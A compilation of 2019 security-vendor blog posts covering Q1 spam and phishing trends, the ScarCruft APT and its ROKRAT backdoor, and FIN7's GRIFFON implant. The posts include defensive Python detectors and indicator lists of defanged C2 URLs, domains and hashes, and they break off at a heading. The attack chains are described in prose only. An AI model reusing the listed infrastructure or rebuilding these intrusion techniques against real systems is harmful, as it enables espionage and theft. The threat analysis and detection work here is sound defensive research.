15 May 2019

Spam and phishing in Q1 2019

Quarterly highlights

Valentine’s Day

As per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.

But most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim’s payment details being sent to the cybercriminals.

New Apple products

Late March saw the unveiling of Apple’s latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.

Growth in the number of attempts to redirect users to phishing Apple sites before the presentation

Fake Apple ID login pages

Scammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.

Fake technical support

Fake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.

Fake “Kaspersky Lab support service” accounts

All these profiles that we detected in Q1 have one thing in common: they offer assistance in matters related to one or another company products, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. Not only do users not have their issue resolved, they are likely to be defrauded as well.

New Instagram “features”

Last year, we wrote that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full — not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.

Cybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.

As usual in such schemes, the “buyer” is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.

Mailshot phishing

In Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization form.

Financial spam through the ACH system

In Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.

“Dream job” offers from spammers

In Q3, we registered spam messages containing “dream job” offers. This quarter, we logged another major mailing topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the “cloud service,” the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim’s machine.

Ransomware and cryptocurrency

As we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of “sextortion” — a topic we wrote about last year.

In Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.

The fictitious employee, whose name varied from message to message, claimed to have found the victim’s details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the “employee” happened to know that the victim was a well-off individual with a reputation to protect — for which a payment of 10,000 dollars in bitcoin was demanded.

Playing on people’s fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.

Malicious attacks on the corporate sector

In Q1, the corporate sector of the Runet was hit by a malicious spam attack. The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.

We also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.

Attacks on the banking sector

Banks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender’s address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message — for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message. The email itself stated that the bank had introduced some new security features that required an update of the account details to use.

The link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.

Statistics: spam

Proportion of spam in mail traffic

Proportion of spam in global mail traffic, Q4 2018 – Q1 2019

In Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.

Proportion of spam in Runet mail traffic, Q4 2018 – Q1 2019

Peak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.

Sources of spam by country

Sources of spam by country, Q1 2019

As is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). The Top 10 is rounded off by Vietnam (2.18%).

Spam email size

Spam email size, Q4 2018 – Q1 2019

In Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2–5 KB messages fell to 8.27% (down 3.15 p.p.). 10–20 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20–50 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).

Malicious attachments: malware families

TOP 10 malicious families in mail traffic, Q1 2019

In Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.

Countries targeted by malicious mailshots

Countries targeted by malicious mailshots, Q1 2019

First place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.

Statistics: phishing

In Q1 2019, the Anti-Phishing system prevented 111,832,308 attempts to direct users to scam websites. 12.11% of all Kaspersky Lab users worldwide experienced an attack.

Attack geography

In Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.

Geography of phishing attacks, Q1 2019

In second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.

Country      %*
Brazil       21.66
Australia    17.20
Spain        16.96
Portugal     16.81
Venezuela    16.72
Greece       15.86
Albania      15.11
Ecuador      14.99
Rwanda       14.89
Georgia      14.76

*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country

Organizations under attack

The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab’s Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

This quarter, the banking sector remains in first place by number of attacks — the share of attacks on credit organizations increased by 5.23 p.p. against Q4 last year to 27.78%.

Distribution of organizations subjected to phishing attacks by category, Q1 2019

Second place went to global Internet portals (19.82%), and payment systems — another category that includes financial institutions — finished third (17.33%).


In Q1 2019, the average share of spam in global mail traffic rose by 0.06 p.p. to 55.97%, and the Anti-Phishing system prevented more than 111,832,308 redirects to phishing sites, up 35,220,650 in comparison with the previous reporting period.

As previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away — on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.

On top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.

13 May 2019

ScarCruft continues to evolve, introduces Bluetooth harvester

Executive summary

After publishing our initial series of blogposts back in 2016, we have continued to track the ScarCruft threat actor. ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula. The threat actor is highly skilled and, by all appearances, quite resourceful.

We recently discovered some interesting telemetry on this actor, and decided to dig deeper into ScarCruft’s recent activity. This shows that the actor is still very active and constantly refining its attack tools. Based on our telemetry, we can reassemble ScarCruft’s binary infection procedure. It used a multi-stage binary infection to update each module effectively and evade detection. In addition, we analyzed the victims of this campaign and spotted an interesting overlap of this campaign with another APT actor known as DarkHotel.

Multi-stage binary infection

The ScarCruft group uses common malware delivery techniques such as spear phishing and Strategic Web Compromises (SWC). As in Operation Daybreak, this actor performs sophisticated attacks using a zero-day exploit. However, sometimes using public exploit code is quicker and more effective for malware authors. We witnessed this actor extensively testing a known public exploit during its preparation for the next campaign.

In order to deploy an implant for the final payload, ScarCruft uses a multi-stage binary infection scheme. As a rule, the initial dropper is created by the infection procedure. One of the most notable functions of the initial dropper is to bypass Windows UAC (User Account Control) in order to execute the next payload with higher privileges. This malware uses the public privilege escalation exploit code for CVE-2018-8120, or UACME, which is normally used by legitimate red teams. Afterwards, the installer malware creates a downloader and a configuration file from its resource and executes it. The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload. In order to evade network-level detection, the downloader uses steganography: the downloaded payload is an image file, but it contains an appended malicious payload to be decrypted.
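The "image with an appended payload" trick described above is cheap to check for on the defender's side: a well-formed JPEG ends at its EOI marker and a PNG at its IEND chunk, so anything after that terminator is foreign data. The following Python is an added example, not code from the report or from ScarCruft's toolset; it walks the JPEG segment table (so an FF D9 inside scan data is not mistaken for the real EOI), walks the PNG chunk list, and reports how much data trails the terminator and how random it looks. The sample files it scans are constructed minimal skeletons, not real images or payloads.

```python
import math
import struct
import zlib

JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"
PNG_SIG = b"\x89PNG\r\n\x1a\n"


def jpeg_trailing_data(data: bytes) -> bytes:
    """Return every byte that follows the real JPEG End-Of-Image marker."""
    if not data.startswith(JPEG_SOI):
        raise ValueError("not a JPEG file")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected a marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xD9:                           # EOI: the image ends here
            return data[pos + 2:]
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:
            pos += 2                                 # standalone markers carry no length
            continue
        seg_len = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        pos += 2 + seg_len
        if marker == 0xDA:                           # SOS: skip entropy-coded scan data
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break                            # a real marker, not FF00 stuffing or RSTn
                pos += 1
    raise ValueError("truncated JPEG: no EOI marker found")


def png_trailing_data(data: bytes) -> bytes:
    """Return every byte that follows the IEND chunk of a PNG file."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4                        # header + data + CRC
        if ctype == b"IEND":
            return data[pos:]
    raise ValueError("truncated PNG: no IEND chunk found")


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte; ~8.0 means the trailer looks encrypted or compressed."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def scan_image(data: bytes) -> dict:
    """Flag an image that carries data after its terminator (the appended-payload pattern)."""
    if data.startswith(JPEG_SOI):
        kind, trailer = "jpeg", jpeg_trailing_data(data)
    elif data.startswith(PNG_SIG):
        kind, trailer = "png", png_trailing_data(data)
    else:
        raise ValueError("unsupported file type")
    return {"type": kind, "trailing_bytes": len(trailer),
            "trailer_entropy": round(shannon_entropy(trailer), 2),
            "suspicious": len(trailer) > 0}


# --- constructed test files (skeletons only, not decodable pictures) ---
def build_jpeg(appended: bytes = b"") -> bytes:
    app0 = b"\xff\xe0" + struct.pack(">H", 4) + b"\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 3) + b"\x01"
    scan = b"\x12\xff\x00\x34\xff\xd0\x56"           # stuffed FF00 and an RST0 inside scan data
    return JPEG_SOI + app0 + sos + scan + JPEG_EOI + appended


def png_chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_png(appended: bytes = b"") -> bytes:
    ihdr = png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
    return PNG_SIG + ihdr + png_chunk(b"IEND", b"") + appended


if __name__ == "__main__":
    for name, blob in (("clean.jpg", build_jpeg()),
                       ("stego.jpg", build_jpeg(bytes(range(256)) * 2)),
                       ("stego.png", build_png(b"\x00" * 32))):
        print(name, scan_image(blob))
```

A trailer of a few bytes can be harmless (some cameras and editors pad files), so the entropy figure is the useful second signal: an appended blob that reads as near-random is what an encrypted stage looks like on disk or in a proxy cache.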

Multi-stage binary infection

The final payload created by the aforementioned process is a well-known backdoor, also known as ROKRAT by Cisco Talos. This cloud service-based backdoor contains many features. One of its main functions is to steal information. Upon execution, this malware creates 10 random directory paths and uses them for a specially designated purpose. The malware creates 11 threads simultaneously: six threads are responsible for stealing information from the infected host, and five threads are for forwarding collected data to four cloud services (Box, Dropbox, Pcloud and Yandex). When uploading stolen data to a cloud service, it uses predefined directory paths such as /english, /video or /scriptout.

Cloud-based backdoor

The same malware contains full-featured backdoor functionality. The commands are downloaded from the /script path of a cloud service provider and the respective execution results are uploaded to the /scriptout path. It supports the following commands, which are enough to fully control the infected host:

  • Get File/Process listing
  • Download additional payload and execute
  • Execute Windows command
  • Update configuration data including cloud service token information
  • Save screenshot and an audio recording

The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration. During our research, we confirmed that they have an interest in mobile devices.

We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester. This malware is responsible for stealing Bluetooth device information. It is fetched by a downloader, and collects information directly from the infected host. This malware uses Windows Bluetooth APIs to find information on connected Bluetooth devices and saves the following information.

  • Instance Name: Name of device
  • Address: Address of device
  • Class: Class of the device
  • Connected: Whether the device is connected (true or false)
  • Authenticated: Whether the device is authenticated (true or false)
  • Remembered: Whether the device is a remembered device (true or false)

The attackers appear to be increasing the scope of the information collected from victims.

Build path of Bluetooth information harvester


We have found several victims of this campaign, based on our telemetry – investment and trading companies in Vietnam and Russia. We believe they may have some links to North Korea, which may explain why ScarCruft decided to closely monitor them. ScarCruft also attacked a diplomatic agency in Hong Kong, and another diplomatic agency in North Korea. It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes.

Victimology of this campaign

Overlap with other actors

We discovered one victim from Russia that also triggered a malware detection while staying in North Korea in the past. The fact that this victim visits North Korea makes it special and suggests that it may have valuable information about North Korean affairs. ScarCruft infected this victim on September 21, 2018. Before the ScarCruft infection, however, another APT group also targeted this victim, with the host being infected with GreezeBackdoor on March 26, 2018.

GreezeBackdoor is a tool of the DarkHotel APT group, which we have previously written about. In addition, this victim was also attacked by the Konni malware on 03 April 2018. The Konni malware was disguised as a North Korean news item in a weaponized document (the name of the document was “Why North Korea slams South Korea’s recent defense talks with U.S-Japan.zip”).

Infection timeline

This is not the first time we have seen an overlap of ScarCruft and DarkHotel actors. Members of our team have already presented on the conflict between these two threat actors at security conferences. We have also shared more details with our threat intelligence customers in the past. They are both Korean-speaking threat actors and sometimes their victimology overlaps. But both groups seem to have different TTPs (Tactics, Techniques and Procedures), which leads us to believe that one group regularly lurks in the other’s shadow.


ScarCruft has shown itself to be a highly skilled and active group. It has a keen interest in North Korean affairs, attacking those in the business sector who may have any connection to North Korea, as well as diplomatic agencies around the globe. Based on ScarCruft’s recent activities, we strongly believe that this group is likely to continue to evolve. For more information please contact: intelreports@kaspersky.com

Appendix I – Indicators of Compromise

File hashes (malicious documents, Trojans, emails, decoys)

ScarCruft tools

  • 02681a7fe708f39beb7b3cf1bd557ee9 Bluetooth info harvester
  • C781f5fad9b47232b3606e4d374900cd Installer
  • 032ed0cd234f73865d55103bf4ceaa22 Downloader
  • 22aaf617a86e026424edb7c868742495 AV Remover
  • 07d2200f5c2d03845adb5b20841faa94 AV Remover
  • 1f5ac2f1744ed9c3fd01fe72ee8d334f Initial Dropper
  • 4d20f7311f4f617104f559a04afd2fbf Installer
  • 03e5e566c1153cb1d18b8bc7c493025f Downloader
  • C66ef71830341bb99d30964a8089a1fc Loader
  • 5999e01b83aa1cc12a2ad6a0c0dc27c3 Installer
  • 4d3c34a3070643c225be1dbbb3457ad4 Injector
  • 0790F1D7A1B9432AA5B8590286EB8B95 Downloader
  • 04371bf88b598b56691b0ad9da08204b Installer
  • e8b23cfc805353f55ed67cf0af58f305 UAC bypass(UACME)
  • 5380a173757e67d9b12f316771012768 Installer
  • Ec0e77b57cb9dd7a04ab6e453810937c Downloader
  • 25701492a18854ffdb05317ec7d19c29 Installer
  • 172b4dc27e41e4a0c84a803b0b944d3e UAC bypass(UACME)
  • 7149c205d634c4d17dae33fffb8a68ab Image file embedded ROKRAT
  • A76c4a79e6ff73bfd7149a49852e8916 ROKRAT
  • F63fc2d11fcebd37be3891def5776f6c Dropper
  • 899e90a0851649a5c270d1f78baf60f2 Simple HTTP Downloader
  • E88f7f285163d0c080c8d3e525b35ab3 Simple HTTP Downloader
  • D7c94c5ba028dc22a570f660b8dee5b9 Simple HTTP Downloader
  • A6bd2cf7bccf552febb8e8347d07529a Simple HTTP Downloader
  • 7a338d08226f5a38353385c8a5dec746 Simple HTTP Downloader
  • 46F66D2D990660661D00F5177306309C Simple HTTP Uploader

GreezeBackdoor of DarkHotel

  • 5e0e11bca0e94914e565c1dcc1ee6860


  • 4c2016df6b546326d67ac2a79dea1343
  • http://34.13.42[.]35/uploads/1.jpg
  • http://34.13.42[.]35/uploads/2.jpg
  • http://34.13.42[.]35/uploads/qwerty.jpg
  • http://34.13.42[.]35/uploads/girl.jpg
  • http://34.13.42[.]35/uploads/girllisten.jpg
  • https://34.13.42[.]35/uploads/newmode.php
  • http://acddesigns.com[.]au/demo/red/images/slider-pic-6.jpg
  • http://kmbr1.nitesbr1[.]org/UserFiles/File/image/index.php
  • http://kmbr1.nitesbr1[.]org/UserFiles/File/images.png
  • http://www.stjohns-burscough[.]org/uploads/images.png
  • http://lotusprintgroup[.]com/images.png
  • https://planar-progress.000webhostapp[.]com/UserFiles/File/image/image/girl.jpg
  • https://planar-progress.000webhostapp[.]com/userfiles/file/sliderpic.jpg
  • http://www.jnts1532[.]cn/phpcms/templates/default/message/bottom.jpg
  • http://www.rhooters[.]com/bbs/data/m_photo/bottom.jpg
  • https://buttyfly.000webhostapp[.]com/userfiles/file/sliderpic.jpg

Domains and IPs

  • buttyfly.000webhostapp[.]com
  • planar-progress.000webhostapp[.]com
  • 120.192.73[.]202
  • 180.182.52[.]76

8 May 2019

The 2019 DBIR Is Out

Once again, we are happy to support a large, voluntary, collaborative effort like the 2019 Data Breach Investigations Report. While our data contribution is completely anonymous, it is based on some of the 2018 data set that our private report customers receive from our efforts to protect all of our customers against every type of malware threat regardless of its source.

In general, the report is an excellent point of reference because it is sourced from so many organizations handling various incidents. This year, the Public Administration sector tops the list by far in terms of reported incidents and data along with the Information sector. “Cyber-Espionage is rampant in the Public sector, with State-affiliated actors accounting for 79 percent of all breaches involving external actors” and “Web applications are targeted with availability attacks as well as leveraged for access to cloud-based organizational email accounts.” Small businesses made up 43% of the reported DBIR breach victims in 2018.

“Use 2FA” is a common refrain throughout the report, along with “squish the phish”. Both two-factor authentication and phishing awareness, training, and handling can go a long way toward improving security in all organizations.

Enjoy another fine read this year!

8 May 2019

FIN7.5: the infamous cybercrime rig “FIN7” continues its activities

On August 1, 2018, the US Department of Justice announced that it had arrested several individuals suspected of having ties to the FIN7 cybercrime rig. FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015. Interestingly, this threat actor created fake companies in order to hire remote pentesters, developers and interpreters to participate in their malicious business. The main goal behind its malicious activities was to steal financial assets from companies, such as debit cards, or get access to financial data or computers of finance department employees in order to conduct wire transfers to offshore accounts.

In 2018-2019, researchers of Kaspersky Lab’s Global Research and Analysis Team analyzed various campaigns that used the same Tactics, Techniques and Procedures (TTPs) as the historic FIN7, leading the researchers to believe that this threat actor had remained active despite the 2018 arrests. In addition, during the investigation, we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations.

Recent FIN7 campaigns

The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year. Kaspersky Lab has been able to retrieve some of these exchanges from a FIN7 target. The spear phishing campaigns were remarkably sophisticated from a social engineering perspective. In various cases, the operators exchanged numerous messages with their victims for weeks before sending their malicious documents. The emails were efficient social-engineering attempts that appealed to a vast number of human emotions (fear, stress, anger, etc.) to elicit a response from their victims. One of the domains used by the attackers in their 2018 campaign of spear phishing contained more than 130 email aliases, leading us to think that more than 130 companies had been targeted by the end of 2018.

Malicious Documents

We have seen two types of documents sent to victims in these spear phishing campaigns. The first one exploits the INCLUDEPICTURE[1] feature of Microsoft Word to get context information about the victim’s computer, and the availability and version number of Microsoft Word. The second one, which in many cases is an Office document protected with a trivial password, such as “12345”, “1234”, etc., uses macros to execute a GRIFFON implant on the target’s computer. In various cases, the associated macro also scheduled tasks to make GRIFFON persistent.

Interestingly, following some open-source publications about them, the FIN7 operators seem to have developed a homemade builder of malicious Office documents using ideas from ThreadKit, which they employed during the summer of 2018. The new builder inserts random values in the Author and Company metadata fields. Moreover, the builder allows them to modify different IOCs, such as the filenames of the wscript.exe or sctasks.exe copies, etc.

wscript.exe copy   sctasks copy   Task name    C2
byzNne10.exe       byzNne17.exe   TaskbyzNne   logitech-cdn.com
c9FGG10.exe        c9FGG17.exe    Taskc9FGG    logitech-cdn.com
zEsb10.exe         zEsb17.exe     TaskzEsb     servicebing-cdn.com

IOCs extracted from docs which use sctasks for GRIFFON persistence

Author        Company       wscript.exe copy   C2
mogjxjtvte    mogjxjtvte    mswmex44.exe       logitech-cdn[.]com
soxvremvge    soxvremvge    c9FGG10.exe        logitech-cdn[.]com
gareljtjhvd   gareljtjhvd   zEsb10.exe         servicebing-cdn[.]com

IOCs extracted from regular documents associated to GRIFFON
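The builder's habit of stamping a random token into both the Author and Company fields is itself a hunting signal: a .docx stores the author in docProps/core.xml (dc:creator) and the company in docProps/app.xml (Company), so an inbound-mail scanner can read both without opening the document in Office. The Python below is an added example, not code from the report or from FIN7's builder; it reads the two fields from a .docx, checks them against the Author/Company values in the table above, and applies a simple "does this look machine-generated" heuristic (identical single lowercase token, long consonant runs). The .docx files it inspects are constructed in memory with only the two property parts.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

CORE_NS = {"cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
           "dc": "http://purl.org/dc/elements/1.1/"}
APP_NS = {"ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"}

# Author/Company values from the report's IOC table for the GRIFFON documents.
KNOWN_BAD_METADATA = {"mogjxjtvte", "soxvremvge", "gareljtjhvd"}


def read_docx_metadata(data: bytes) -> dict:
    """Pull Author (docProps/core.xml) and Company (docProps/app.xml) out of a .docx."""
    meta = {"author": "", "company": ""}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if "docProps/core.xml" in names:
            node = ET.fromstring(zf.read("docProps/core.xml")).find("dc:creator", CORE_NS)
            meta["author"] = (node.text or "") if node is not None else ""
        if "docProps/app.xml" in names:
            node = ET.fromstring(zf.read("docProps/app.xml")).find("ep:Company", APP_NS)
            meta["company"] = (node.text or "") if node is not None else ""
    return meta


def longest_consonant_run(s: str) -> int:
    runs = re.findall(r"[b-df-hj-np-tv-z]+", s.lower())
    return max((len(r) for r in runs), default=0)


def assess_metadata(meta: dict) -> list:
    """Return the reasons (possibly none) the metadata looks generated or is known bad."""
    reasons = []
    author, company = meta["author"], meta["company"]
    if author in KNOWN_BAD_METADATA or company in KNOWN_BAD_METADATA:
        reasons.append("matches a known-bad Author/Company value")
    if author and author == company and re.fullmatch(r"[a-z]{8,16}", author):
        reasons.append("Author and Company are the same single lowercase token")
    for field, value in (("Author", author), ("Company", company)):
        if value and longest_consonant_run(value) >= 4:   # heuristic threshold, an assumption
            reasons.append("%s has an unpronounceable consonant run: %s" % (field, value))
    return reasons


def build_docx(author: str, company: str) -> bytes:
    """Constructed minimal .docx carrying only the two property parts (for testing)."""
    core = ('<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s"><dc:creator>%s</dc:creator>'
            '</cp:coreProperties>' % (CORE_NS["cp"], CORE_NS["dc"], author))
    app = '<Properties xmlns="%s"><Company>%s</Company></Properties>' % (APP_NS["ep"], company)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docProps/core.xml", core)
        zf.writestr("docProps/app.xml", app)
    return buf.getvalue()


if __name__ == "__main__":
    for label, doc in (("builder-style", build_docx("mogjxjtvte", "mogjxjtvte")),
                       ("ordinary", build_docx("Jane Doe", "Example Corp"))):
        meta = read_docx_metadata(doc)
        print(label, meta, assess_metadata(meta) or ["no findings"])
```

The consonant-run rule is deliberately crude and will occasionally flag real surnames, so treat it as a triage score rather than a verdict; the exact-match list is the high-confidence part, and the identical-token rule catches new builder output that the list does not yet know.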


Griffon Malware attack pattern

The GRIFFON implant is a lightweight JScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. We were able to obtain four different modules during the investigation.

Reconnaissance module

The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JScript, which allows the cybercriminals to understand the context of the infected workstation. This module mainly relies on WMI and Windows objects to deliver results, which will be sent back to the operators. Interestingly, more than 20 artifacts are retrieved from the system by this implant during the reconnaissance stage, from the date and time of operating system installation and membership in a Windows domain to a list of the workstation’s monitors and their resolutions.

Meterpreter downloader

The second module is used by the operators to execute an obfuscated PowerShell script, which contains a Meterpreter downloader widely known as “Tinymet”. This downloader, seen in past FIN7 campaigns, downloads a one-byte XOR-encrypted (e.g. with the key equal to 0x50 or 0x51) piece of Meterpreter shellcode to execute.
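A one-byte XOR layer hides the stage from naive signature matching but gives an analyst only 256 keys to try, which is how a captured download is usually triaged. The Python below is an added example, not code from the report or from the Tinymet downloader: it brute-forces every single-byte key over a captured blob and picks the key whose output contains the most occurrences of strings a Meterpreter stage would carry (the marker list is an assumption for illustration). The blob it analyses is a constructed stand-in, ordinary bytes with those strings embedded, XORed with 0x51; it is not shellcode.

```python
# Strings one would expect in a decoded Windows stage; an assumed list, extend for your own use.
MARKERS = (b"ws2_32", b"kernel32", b"This program cannot be run")


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def recover_single_byte_xor(blob: bytes, markers=MARKERS):
    """Try all 256 keys; return (key, hits, matched_markers) for the key whose
    plaintext contains the most marker occurrences, or None if none matches."""
    best = None
    for key in range(256):
        plain = xor_bytes(blob, key)
        matched = [m for m in markers if m in plain]
        hits = sum(plain.count(m) for m in matched)
        if hits and (best is None or hits > best[1]):
            best = (key, hits, matched)
    return best


def analyse_download(blob: bytes) -> dict:
    """Summarise a captured download: was it single-byte XORed, and with which key?
    Key 0 means the markers were already visible, i.e. no XOR layer at all."""
    result = recover_single_byte_xor(blob)
    if result is None:
        return {"encoded": None, "key": None, "hits": 0, "markers": []}
    key, hits, matched = result
    return {"encoded": key != 0, "key": key, "hits": hits,
            "markers": [m.decode("ascii") for m in matched]}


# Constructed sample: filler bytes plus typical import strings, XORed with 0x51
# as in the key example given in the text. Not real shellcode.
SAMPLE_PLAIN = (b"\x90" * 16 + b"ws2_32.dll\x00kernel32.dll\x00"
                + bytes(range(0x20, 0x7F)) + b"ws2_32")
SAMPLE_BLOB = xor_bytes(SAMPLE_PLAIN, 0x51)

if __name__ == "__main__":
    print(analyse_download(SAMPLE_BLOB))      # expects key 0x51 and 3 marker hits
    print(analyse_download(SAMPLE_PLAIN))     # expects key 0: nothing to decode
    print(analyse_download(b"\x00" * 64))     # expects no match at all
```

Marker counting rather than a printable-character score is used on purpose: a real stage is mostly non-printable machine code, so frequency-based scoring that works on XORed text tends to fail on it, while a handful of import-table strings survive intact under any single-byte key.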

Screenshot module

The third module allows the operators to take a screenshot of the remote system. To do that, it also drops a PowerShell script on the workstation to execute. The script executes an open-source .NET class used for taking a screenshot. The resulting screenshot is saved at “%TMP%/image.png”, sent back to the attackers by the GRIFFON implant and then deleted.

Persistence module

The last retrieved module is a persistence module. If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim’s workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. Here is a PowerLinks-style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the “file-less” aspect of this method.

Through its light weight and modular architecture, the GRIFFON implant is the perfect validator. Even though we have been able to retrieve four different modules, it is possible that the FIN7 operators have more modules in their toolsets for achieving their objectives on the victim’s workstation.

On the hunt for GRIFFON infrastructure

